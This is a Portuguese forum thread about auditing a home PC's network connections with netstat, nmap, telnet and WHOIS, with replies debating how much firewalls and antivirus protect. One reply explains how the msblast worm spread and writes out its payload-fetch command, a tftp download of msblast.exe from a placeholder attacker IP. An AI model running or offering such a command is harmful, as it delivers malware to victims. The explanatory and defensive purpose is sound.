Jump to content

Analisar as comunicações no vosso PC

teckV

By teckV
in Segurança e Redes

 Share

Recommended Posts

teckV boolean user

teckV

Posted
Posted

para analisarem as ligações no vosso PC para analisarem possiveis ligações não autorizadas...

para isso usa-se o netstato NMAPo telnetas  querys WHOIS e se necessário o Ethereal...

nesta tread vamos analisar os primeiros...

o netstat:

o netstat corre na linha de comandos do DOS e serve para apresentar as ligações IP no vosso PC... analisa as ligaçõesque protocolos usamqual o IP destino da ligação e o estado da mesma... com a opção -b tambem é possivel analisar o programa que está a usar a ligação...

recorrendo aos PIPES do MS-DOS é possivel fazer relatórios em ficheiro a partir deste comando...

c:\netstat

opções:

-a - todas as liações e não só as activas

-n - mostra numa formatação mais agradavel

-b - apresenta os programas e processos que estão a usar a ligação.. isto é importante para perceber qyue ligação é e o qye está a fazer

exemplo para criar um ficheiro de texto com todas as ligações e respectivos programas que as estão a usar... executar na linha de comandos do MS-DOS

c:\netstat -bn > ligacoes.txt

assim ficam com um file chamado ligacoes.txt com o resultado do comando... nesse file podem ver todos os endereçosprotocolosportas e programass nasa ligações activas no vosso PC.. reparem que não usei o -a

exemplo de output no file ligacoes.txt... o file foi criado usando PIPES.. que é direcionar o output de um programa para um ficheiro... >

o file fica na pasta onde correram o comando

TCP    127.0.0.1:1159        127.0.0.1:1158        ESTABLISHED    3148

  [firefox.exe]

  TCP    127.0.0.1:3176        127.0.0.1:1110        ESTABLISHED    2296

  [msnmsgr.exe]

  TCP    127.0.0.1:4034        127.0.0.1:1110        ESTABLISHED    2148

  [eMule.exe]

  TCP    192.168.1.2:3137      207.46.109.36:1863    ESTABLISHED    2296

  [msnmsgr.exe]

  TCP    192.168.1.2:3177      195.23.79.39:80        ESTABLISHED    444

  [avp.exe]

  TCP    192.168.1.2:3625      195.23.135.14:6667    ESTABLISHED    1720

  [mirc.exe]

isto é visto de dentro do pc... para analisarem se estão serviços estranho à escuta na vossa maquina (pode ser spyware ou cavalos de troia 🙂 ) usem o nmap

c:\nmap -sT -A localhost > servicos.txt

a opção -A  serve para identificar o serviço.. se é o Apache ou outro... muito bom mesmo...

nos passos anteriores ficam com info sobre as ligações... agora é necessário investigas aquelas que são suspeitas ou não conhecem... uma coisa a fazer é ver que serviço é e para onde está a comunicar...

caso o nmap não tenha identificado o serviço podem experimentar o telenet para ver o banner do serviço...

syntax: telnet endereço porta

c:\telnet localhost 800

se for um web server por exemplo mostra o seu banner com a info respectiva... analisando o output podem identificar alguns serviços... o telnet mostra os dados entre o serviço e a shell

se quiserem identificar o endereço e saber a quem pertence o IP usem as querys WHOIS... um site muito bom para isso é

http://www.dnsstuff.com/

nesse site podem ver em que nome ou empresa está registado o IP.. o contacto da pessoa e até  a cidade onde está...

teckV

NuGuN boolean user

NuGuN

Posted
Posted

nao e -b, mas sim -bn

b e n são flags distintas, cada uma têm a sua função, só que ai estão juntas mais nada 🙂

Aqui tenho a opção n e costumo utilizar mas a b não tenho e nem sabia de existir  ?

Cumps

teckV boolean user

teckV

Posted
  • Author
Posted
teckV nem sabes a ajuda que me deste

porque?? já tavas "owned"??  o ppl deve manter o olho na segurança do PC porque anda por ai muita coisa... já há um grande negocio em torno destas cenas...

usem tambem o nmap com frequencia para procurar programas estranhos e não autorizados que estejam istalados e à escuta no vosso PC... com estas técnicas podem identificar facilmente essas situações...

exemplo de uso do nmap para procurar programas indesejados que estejam prontos a responder a comandos de Crackers manhosos...

c:\nmap -sT -A -P0 localhost

todos os trojanos e spywares comunicam com a Net... faz parte da filosofia e modo operandus deles... portantos com o NetStat e o nmap podem encontra-los...

isto é importante por causa das limitações dos Anti-Virus e muitaas firewalls...os anti-virus só conseguem descobrir virus que conheçam, que estejam na base de dados de assinaturas... e muitas das firewalls só cortam as ligações de fora para dentro... isto porque muitos dos programas hoje comunicam com a net e era muito complicado estar sempre abrir as portas e pior que isso é o facto de muitos desses progrmas usarem portas temporarias e aleatorias...  ?

lol

sry,  nc me dei muito bem com esse tipo de programas

esse tipo de programas?? 'isso quer dizer o que?? por ser linha de comandos apenas?? na segurança é preciso dominar a informática e os comandos de shell são sem duvida alguma os mais importantes... os GUI são apenas "capas" limitadas para as funcionalidades CORE...

sobre a questão da opção -b... tambem marei... eu sabia que as versões especiais eram diferentes (conceito de justiça e igualdade do Bill das gaitas é mesmo estranho) mas não sabia que era assim tanto... tambem não pude confirmar se é por umas serem Professional editon e outros Home edition.. de qualquer forma não faz sentido tendo em conta o utilitáio que é... o netstat devia vir de base com as maximas potencialidades em todas as distros... os varios PC´s a que tenho acesso todos têm esta opção e até pedi para me confirmarem noutros e tambem têm essa opção...

e como podem ver no output que postei do file criado pelo netstat -nb...

TCP    127.0.0.1:1159        127.0.0.1:1158        ESTABLISHED    3148

  [firefox.exe]

  TCP    127.0.0.1:3176        127.0.0.1:1110        ESTABLISHED    2296

  [msnmsgr.exe]

aqui está o resultado dessa opção.. o nome do programa  [firefox.exe]... em algumas distros de XP

em anexo a esta resposta está um print screen do help do Netstat num XP que tenho...

tambem se pode ter um resultado parecido com a versão mais light do netstat... a que não tem a opção -b tão util e eficaz...  senão tiverem a opção -b usem a opção -o para identificarem o numero do processo [PID]... no Task Manager do windows podem identificar o processo e programa que está a usar a ligação através do respectivo [PID]... mas é muito mais trabalhoso e ridiculo tendo em conta haver a funcionalidade da opção -b já criada...  ?

e grande omissão minha    :fartnew2: ?     a versão linux... infelizmente não simplificam a vida das pessoas seguindo normas universais... enfim...

em linux as opções que mais gosto são a famosa -tup

#netstat -tup

se quiser guardar o resultado num file tambem se usa os PIPES "netstat -tup > file.txt"

Para saber mais!!!

TUTORIAL MUiTO BOM SOBRE O NETSTAT

teckV

mgl void

mgl

Posted
Posted

Convém não fazerem isto com o emule ligado 😛

Penso que quando se tem o windows actualizado, uma boa fw e av, isto n é mt necessário. Alem do facto q é preciso ter alguns conhecimentos pa n criar falsos alarmes 🙂

Hipnoted boolean user

Hipnoted

Posted
Posted

Penso que quando se tem o windows actualizado, uma boa fw e av, isto n é mt necessário. Alem do facto q é preciso ter alguns conhecimentos pa n criar falsos alarmes 🙂

Não estamos a falar disso (AV e FW), mas sim de analisar as nossas ligações. 😛

"Nunca discutas com um idiota. Eles arrastam-te até ao seu nível e depois ganham-te em experiência"

NuGuN boolean user

NuGuN

Posted
Posted

Talvez seja por eu nesta partição onde estou agora não ter SP2 instalado, eu à muito tempo que utilizo o netstat e não me lembro de ver essa opção, utilizo  o XP Pro, não estou bem a ver o porquê disto....

Citação
...também se pode ter um resultado parecido com a versão mais light do netstat... a que não tem a opção -b tão util e eficaz...  senão tiverem a opção -b usem a opção -o para identificarem o numero do processo [PID]... no Task Manager do windows podem identificar o processo e programa que está a usar a ligação através do respectivo [PID]...

Eu as vezes faço assim ou utilizo outro método:

Para saber os programas que estão a utilizar portas utilizo esta linha a baixo que me dá o PID e o nome do processo: 

for /F "usebackq tokens=4,5" %i in (`netstat -ao ^| find "LISTENING"`) do @for /F "usebackq tokens=1,2" %k in (`tasklist`) do @if %j == %l @echo %j %k

Para saber o nome do Processo e a porta utilizo: 

for /F "usebackq tokens=2,3,4,5,6,7 delims=: " %g in (`netstat -nao ^| find "LISTENING"`) do @for /F "usebackq skip=2 tokens=1,2" %m IN (`tasklist`) do @if %l == %n @echo %h %m

Funciona apenas no XP Pro porque o Home não tem a comando Tasklist

mgl void

mgl

Posted
Posted
Em 03/11/2006 às 00:05, Hipnoted disse:

Não estamos a falar disso (AV e FW), mas sim de analisar as nossas ligações. 🙂

Em 02/11/2006 às 20:11, teckV disse:

para analisarem as ligações no vosso PC para analisarem possiveis ligações não autorizadas...

para isso usa-se o netstat, o NMAP, o telnet, as  querys WHOIS e se necessário o Ethereal...

Só há ligações não autorizadas se o sistema não estiver bem protegido, por exemplo: sem\má fw ou av, ou SO não actualizado 😛

teckV boolean user

teckV

Posted
  • Author
Posted
Só há ligações não autorizadas se o sistema não estiver bem protegido, por exemplo: sem\má fw ou av, ou SO não actualizado

não é assim tão simples... a informática é um mundo muito complexo e baseia-se em tecnologia e toda a tecnologia pode ser contornada...

volto a dizer que há muitas formas de se ser infectado e até com todos os cuidados pode acontecer... são muitos os casos de intrusões em redes de alta segurança protegidas por muitos equipamentos de muitos milhões de dollars... o cracking está sempre à frente... por exemplo... se alguem criar um worm que explore uma falha num programa ou serviço que usem e pode ser o Internet Explorer ou o Firefox ou outro qualquer (nenhum programa é perfeito), mesmo com firewall e anti-virus a pessoa pode ser afectada... os worms espalham-se indescriminadamente pela net usando "exploits" para entrar e infectar os sistemas...

as firewalls necesitam deixar passar trafego e isso pode ser usado maliciosamente...

existem técnicas muito avançadas de intrusão e chamo a atenção ao ppl em relação a isso... não se pode afirmar coisas destas na informatica... nos testes de intrusão que profissionais como eu fazem, são efectuadas intrusões com sucesso em redes consideradas de alta segurança... é um mundo muito complexo e a capacidade dos hackers é brutal...  🙂 ? 😛🙂

resumindo... mesmo com firewall e Anti Vius é possivel ser-se infectado... por exemplo... confimas sempre o MD5 de todos os files que descarregas na net?? como podes garantir que um certo freeware muito fixe que encontras na net não têm um backdoor (porta do cavalo, trojan)?? mesmo com a assinatura MD5 não comprovas se têm ou não. apenas comprovas se é o orignial...

portantos... nunca há segurança a 100% e todo o cuidado é pouco...

e o mais importante disto tudo é o conhecimento que passei.. obviamente este conhecimento é tambem muito usado na administração e manutenção de redes e sistemas e é uma forma de se explorar os mesmos... portantos.. vale sempre a pena este tipo de informação

o próximo vai ser na analise de trafego ou sniffing com o ethereal ... tambem server para diagnostico e manutenção de sistemas, softwares e redes...

PS: NuGuN ... as imagens que colocaste não se conseguem ver... aparece apenas uma barra horizontal    :down:

teckV

mgl void

mgl

Posted
Posted
Só há ligações não autorizadas se o sistema não estiver bem protegido, por exemplo: sem\má fw ou av, ou SO não actualizado

não é assim tão simples... a informática é um mundo muito complexo e baseia-se em tecnologia e toda a tecnologia pode ser contornada...

volto a dizer que há muitas formas de se ser infectado e até com todos os cuidados pode acontecer... são muitos os casos de intrusões em redes de alta segurança protegidas por muitos equipamentos de muitos milhões de dollars... o cracking está sempre à frente... por exemplo... se alguem criar um worm que explore uma falha num programa ou serviço que usem e pode ser o Internet Explorer ou o Firefox ou outro qualquer (nenhum programa é perfeito), mesmo com firewall e anti-virus a pessoa pode ser afectada... os worms espalham-se indescriminadamente pela net usando "exploits" para entrar e infectar os sistemas...

as firewalls necesitam deixar passar trafego e isso pode ser usado maliciosamente...

existem técnicas muito avançadas de intrusão e chamo a atenção ao ppl em relação a isso... não se pode afirmar coisas destas na informatica... nos testes de intrusão que profissionais como eu fazem, são efectuadas intrusões com sucesso em redes consideradas de alta segurança... é um mundo muito complexo e a capacidade dos hackers é brutal...  😛 ? 😛🙂

resumindo... mesmo com firewall e Anti Vius é possivel ser-se infectado... por exemplo... confimas sempre o MD5 de todos os files que descarregas na net?? como podes garantir que um certo freeware muito fixe que encontras na net não têm um backdoor (porta do cavalo, trojan)?? mesmo com a assinatura MD5 não comprovas se têm ou não. apenas comprovas se é o orignial...

portantos... nunca há segurança a 100% e todo o cuidado é pouco...

e o mais importante disto tudo é o conhecimento que passei.. obviamente este conhecimento é tambem muito usado na administração e manutenção de redes e sistemas e é uma forma de se explorar os mesmos... portantos.. vale sempre a pena este tipo de informação

o próximo vai ser na analise de trafego ou sniffing com o ethereal ... tambem server para diagnostico e manutenção de sistemas, softwares e redes...

PS: NuGuN ... as imagens que colocaste não se conseguem ver... aparece apenas uma barra horizontal    :down:

teckV

Sim sim eu sei. Eu estava a refirir-me à segurança dos computadores lá de casa, onde as fw só permitem o acesso à net dos programas autorizados, e longe vai o tempo em que bastava injectar o código malicioso num programa "conhecido" (IE, explorer.exe, etc). Agora as fw estão mt mais complexas, mas não são perfeitas como é óbvio. Qd disse que uma boa fw & av é td o q é preciso para nos poupar umas chatices, estava a falar dos tais computadores lá de casa. Por exemplo, imaginemos 1 worm q s propaga através de um 0day, por exemplo o antiguinho msblast. O q ele fazia era explorar uma vulnerabilidade, se bem me lembro, no serviço dcom rpc. Aqui vai um pequeno esquema:

1) Atacante(computador q já foi infectado) --(exploit)--> Victima

2) o shellcode do exploit criava um bind shell na port 4444

3) era ordenado à victima que executasse o seguinte comando "tftp -i IP_DO_ATACANTE GET msblast.exe"

..ora, o passo 3 nc teria sucesso caso a "victima" tivesse uma fw, pois esta iria pedir autorização para permitir o acesso do tftp à net. Era isto a q eu queria chegar, a pessoa só seria infectada se quisesse. Hj em dia os av até detectam 1 possivel "virus" antes de abrir a página. Claro q n protege 100%, mas pa pcs caseiros fica lá perto, na minha humilde opnião claro. 😛

cumps

EDIT: já agora, concordo plenamente ctg, esses conhecimentos q tu espalhas são importantissimos para administração de sistemas.

o próximo vai ser na analise de trafego ou sniffing com o ethereal ... tambem server para diagnostico e manutenção de sistemas, softwares e redes...

fico à espera  8)

EDIT2: só pa dizer que de facto, tb analizo as ligações de vez em qd 😛   e q n uso o netstat, pois sinto q é 1 bocado incompleto, uso isto antes, mostra os processos e claro, tem gui  😁

teckV boolean user

teckV

Posted
  • Author
Posted
EDIT2: só pa dizer que de facto, tb analizo as ligações de vez em qd    e q n uso o netstat, pois sinto q é 1 bocado incompleto, uso isto antes, mostra os processos e claro, tem gui

o netstat tambem mostra os processos... numas versões com a opção -o e noutrass com a opção -b... a nivel de GUI faz o mesmo... ambos servem apenas para mostrar info..  mass claro que os muitos utilitarios da sysinternals são muito bons... neste caso é desnecessário...

teckV

  • 1 year later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.